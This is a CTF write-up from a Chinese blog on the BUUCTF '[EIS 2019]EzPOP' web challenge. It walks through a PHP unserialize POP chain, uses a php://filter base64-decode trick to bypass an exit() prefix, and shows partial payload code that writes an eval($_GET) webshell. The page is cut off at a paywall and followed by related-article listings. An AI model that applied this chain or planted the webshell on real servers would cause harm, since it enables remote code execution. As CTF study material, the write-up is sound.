BUUCTF__[EIS 2019]EzPOP_题解

最新推荐文章于 2025-02-13 21:50:02 发布
最新推荐文章于 2025-02-13 21:50:02 发布
阅读量1.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: BUU做题记录 文章标签: php 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/116208390

前言

  • 好久没写了,懒了

解题

  • 最后有一个反序列化函数unserialize来推一波poc利用链。

  • 从后往前推,首先看到file_put_contents函数,可以写入webshell文件。

  • 再来看看两个参数。其中可以看到data,经过了拼接处理,其中有一个exit好像不太行,但我们可以利用php伪协议绕过,看看这篇详情介绍谈一谈php://filter的妙用

    $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

  • 往上,虽然有个数据压缩的代码,但是只需要options['data_compress']为假就不进入if不执行,经过了serialize函数,但这个函数并非是序列化函数,而是在class B中自定义的serialize函数。

  • 但是$value变量来自class A中调用set函数时传递的$contents变量。那么class是怎么调用class B中的set函数,首先魔术方法__destruct()在反序列化时被调用,if一个 !$this->autosave,这就要求$this->autosave为假,然后是调用save()函数,其中的$this->store->set();完成调用,这就要求$this->storeclass B的对象。

  • 在往上,$contents变量来自函数getForStorage();的返回值,其中参数为数组[$cleaned, $this->complete],两个选择,第一让$cleaned为shell内容,第二就是$complete,显然$complete更简单,所以让$complete为shell内容,那么$cleaned为一个空数组就行了。

  • 再来看看filename,往上找的一个就是函数getCacheKey($name);的返回值,返回的是options['prefix'] . $name;两个变量拼接,其中$name来自class A中调用set函数时传递的$key变量。结束。

  • 然后就再来看看具体的paylaod。

  • 首先调用class Bset函数的条件$this->autosave=false$this->store=new B();

  • 再是shell路径$this->key = "php://filter/write=convert.base64-decode/resource=shell.php";options['prefix']不要也行,反正只是拼接。

  • 然后来看shell内容,首先绕过数据压缩$this->options['data_compress'] = false;

  • 然后是让$cleaned为空数组,它调用了cleanContents($this->cache);因为函数参数是数组类型,所以让$this->cache=array();为一个空数组,防止调用报错。

  • 最后是shell内容,$this->complete = base64_encode("xxx".base64_encode('<?php @eval($_GET["1"]);?>'));$this->options['serialize'] = 'base64_decode';

  • 第一次编码是为了绕过exit,第二次是为了防止出错,但中间拼接的'xxx'的作用是啥?

  • base64算法解码时是4个字节一组,如果直接伪协议base64解码前面拼接内容"<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n"如果不足4的倍数会向后取三位补足4的倍数,破坏我们的shell内容,所以我们加上字符补全,来看看需要补多少个字符。

  • sprintf('%012d', $expire)不用管,输出12个字节刚好。由于<、?、()、;、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以剩下phpexit九个字节,补三个。

  • payload

<?php
class A{
   
   
    protected $store;
    protected $key;
    protected $expire;

    public function __construct()
    {
   
   
        $this->cache = array();
        $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_GET["1"]);?>'));
        $this->key = "php://filter/write=convert.base64-decode/resource=1.php";
        $this->store = new B();
        $this->autosave = false;
    }


}
class B{
   
   
    public $options = array()
最低0.47元/天 解锁文章

200万优质内容无限畅学
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1533
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
EIS 2019——misc3
pigredfive的博客
11-29 405
题目截图: 打开网页,有下载链接,下载下来一个html文件,打开: 解题过程: 一个html文件,可以考虑按F12来看一下源代码里面有没有flag。 找到一堆由Unicode编码格式的 (&zwnj ; )(&#8203 ; ) 这两个字符可以考虑用0,1替换掉,然后二进制转ascii。先考虑 (&zwnj ; )为0,(&#8203 ; )为1 的情况: ...
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 460
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
[EIS 2019]EzPOP
qq_43801002的博客
05-15 1591
#题目: <?php error_reporting(0); class A{ protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $sto
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
VIDIOC_RK_EIS
最新发布
09-03
由于给定的参考引用中未包含关于VIDIOC_RK_EIS的相关信息,下面基于一般的V4L2(Video for Linux 2) ioctl命令的知识进行推测性解答。 ### 功能 VIDIOC_RK_EIS可能是与Rockchip(RK)平台的电子图像稳定...
discuz模板 Eis_City_Eight 商业版1.0 GBK+UTF8 dz模板5种配色.rar
12-02
模板介绍 5套配色方案,您也可以通过更换背景图片来制作新的配色; 免费版仅保留顶部与底部样式,与演示网站有很大差别,仅供免费体验,不喜勿下; 模板采用标准CSS+DIY制作,自动调用图片缩略图;...
『CTF Web复现』BUUCTF-[EIS 2019]EzPOP
Ho1aAs‘s Blog
10-07 1440
# 利用点 - base64 + filter协议绕过死亡exit
EIS2019-EzPOP
ro4lsc的博客
05-14 1553
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
序列化与反序列化——[EIS 2019]EzPOP
LSYZWF的博客
11-06 433
文章目录题目解答 题目 链接:https://buuoj.cn/challenges#[EIS%202019]EzPOP 解答 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS 2019]EzPOP-PHP代码审计学习
cjdgg的博客
03-09 338
[EIS 2019]EzPOP-PHP代码审计学习 作为一个不太聪明的WEB安全菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
132,【1】 buuctf web [EIS 2019]EzPOP
2402_87039650的博客
02-13 402
不过啊,不过啊,下面几个代码块首先引起了我的关注,截下来更方便看。先不进入靶场了,先看给出的代码。还是很懵,先看看大佬脚本。那要不还是继续看代码吧。
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 371
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 447
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值